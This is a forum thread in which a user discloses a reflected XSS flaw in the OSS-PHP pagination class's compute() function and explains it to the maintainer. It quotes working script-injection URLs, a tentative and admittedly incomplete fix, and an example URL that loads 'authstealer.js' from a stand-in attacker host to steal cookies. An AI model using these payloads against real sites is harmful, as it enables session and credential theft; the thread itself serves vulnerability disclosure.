OSS-PHP pagination - XSS Vulnerability

[randome]

Hey there,

I found a XSS Vulnerability within the OSS-PHP Pagination Class ...
oss_paging.class.php --> public function compute()

$this->pageBaseURI = preg_replace('/&(?:' . $this->pageParameter . '|' . $this->rowsParameter . ')=[\d]+/', '', $_SERVER['REQUEST_URI'])
. $this->paramSeparator . $this->rowsParameter . '=' . $this->resultRows . $this->paramSeparator . $this->pageParameter . '=';

As you simply output $_SERVER['REQUEST_URI'] one can inject malicious JS Code ...

/search.html?p=170"><script>prompt(955422)</script>&query=1&rows=15"><script>prompt(955422)</script>&blubb="><script>prompt(955422)</script>

One can inject within known Parameters like p or rows - or even with dummy Parameters ...

$this->pageBaseURI = str_replace("&&", "&", preg_replace('/(?:' . $this->pageParameter . '|' . $this->rowsParameter . ')=.*(?:\&|$)/U', '', $_SERVER['REQUEST_URI'])
. $this->paramSeparator . $this->rowsParameter . '=' . (int)$this->resultRows . $this->paramSeparator . $this->pageParameter . '=');

modified it a bit to be safe for the known parameters - but not sure how to protect the dummy Parameters ... guess the whole Function needs to be adapted to be safe ... (go though every GET Param and sanitize input)

Anyone got a better idea?

Bye from snowy Austria
Andreas Schnederle-Wagner

[Alexandre Toyer]

Hello,

Thank you for your warning. However I have some trouble understanding how this could result in an XSS vulnerability. Could you please exlain what a full workflow would be?

Thank you,
Alexandre

[randome]

Hi Alexandre,

if I call the Page like this:
/search.html?query=1&blubb="><script>prompt(955422)</script>&rows=15"><script>prompt(955422)</script>&p=5"><script>prompt(955422)</script>

it results in an Output like this:

[randome]

alright - seems I broke the board with this Code ... ;-)

URL: /search.html?query=1&blubb="><script>prompt(955422)</script>&rows=15"><script>prompt(955422)</script>&p=5"><script>prompt(955422)</script>

Result:

[Alexandre Toyer]

Hi Andreas,

Yes the page is broken... I can not edit or delete your previous posts.

I understand the process you describe but I can't see exactly how this could be an XSS vulnerability. You can only inject Javascript code in the page YOU see. You will not be able to inject javascript code in the page that others would see.

For example in this forum you were able to break the page, but say the javascript you entered in your reply would have been executed for me when I load the page that would possibly be an XX vulnerability.

Do you see what I mean? Could you explain further what the threat would be for other people?

Thank you,
Alexandre

[randome]

Hi,

unfortunetely you are not entirely correct about I can only inject within Pages I see ... I wish it would be that way ... ;-)
Guess you are speaking about Persistent XSS .... but this is a kind of Reflected XSS ...

Imagine this URL:

http://www.mysearchserver.com/search.html?query=myVeryCoolSearchString&rows=15&p=5&anotherparam"><script%20src="http://mallorysevilsite.com/authstealer.js" />

(authstealer.js does something nasty to your PC ... stealing Cookies, exploiting some Windows 0-Day Exploit, or whatever ...)

Now I send this Link within E-Mail / Spam to others who click it ... et voilà ... JS successfully injected ... ON THEIR SIDE
Or I distribute this modified Link within some Forums, on Web-Sites, ... one can imagine hundreds of ways how to distribute such a XSS-infested Link to the masses ...

Especially dangerous is - they all think they are visiting some serious Site ... and don't know there is something nasty going on ...

Maybe you want to have a look at the WIKI Page: http://en.wikipedia.org/wiki/Cross-site_scripting

Hope you see the attack vector now :)

Andreas

ps) also tried to edit my posts to "unbreak" the Forum ... but wasn't able too ... :-/

[randome]

see the Problem now? :)